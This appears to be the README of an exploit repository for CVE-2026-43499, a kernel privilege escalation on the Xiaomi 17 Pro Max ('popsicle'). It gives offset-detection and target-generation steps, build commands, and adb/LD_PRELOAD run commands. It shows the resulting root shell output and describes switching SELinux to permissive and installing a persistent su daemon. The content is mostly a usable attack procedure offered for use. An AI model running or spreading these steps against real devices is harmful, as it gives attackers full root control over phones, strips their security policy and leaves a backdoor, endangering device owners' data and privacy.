## https://sploitus.com/exploit?id=7BD5D8CE-341C-5128-A9AE-5B4764B1ABFF
# CVE-2026-43499 for `popsicle`
This repository contains the exploit for CVE-2026-43499 targeting Xiaomi 17 Pro Maxโs `popsicle` component. This exploit is applicable to devices with a kernel version of `6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k` (tested on versions `popsicle_images_OS3.0.313.0.WPBCNXM_16.0` and `popsicle_images_OS3.0.315.0.WPBCNXM_16.0`). ## `popsicle` Profile
```json
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000",
"target_device_path": "/dev/uinput",
"direct_root_cpu": 7
}
```
The first two physical addresses can be derived from the memory layout of a rooted device by reading `/proc/iomem`:
```sh
python3 detect_offset.py
```
This script automatically reads the memory layout of the first available device using `adb shell su -c` and prints the two profile fields. The last two fields can be obtained by running the following script:
```sh
python3 detect_device.py
```
## Generate the target
Requires Python 3 and `llvm-objdump`:
```sh
python3 generate_target.py \
--boot boot.img \
--profile profile.json \
-o source/src/target.h
```
## Compile
```sh
make -C source clean preload
```
If NDK cannot be automatically detected:
```sh
NDK_ROOT=/path/to/android-ndk make -C source clean preload
```
Output:
```text
source/build/bin/preload.so
```
## Run
```sh
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
```
Upon success, the following output will be displayed:
```text
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
```
After obtaining `init_cred`, switch SELinux to Permissive, and reload the current policy. Then install `/data/local/tmp/su`, use `adb mount` to access the `su` namespace, and start the `su` daemon that runs continuously during the current boot cycle. This setting will take effect after rebooting. ## Limitations
After exploiting this vulnerability, newly launched app processes may not complete the Framework initialization process. Restarting the device will restore this functionality.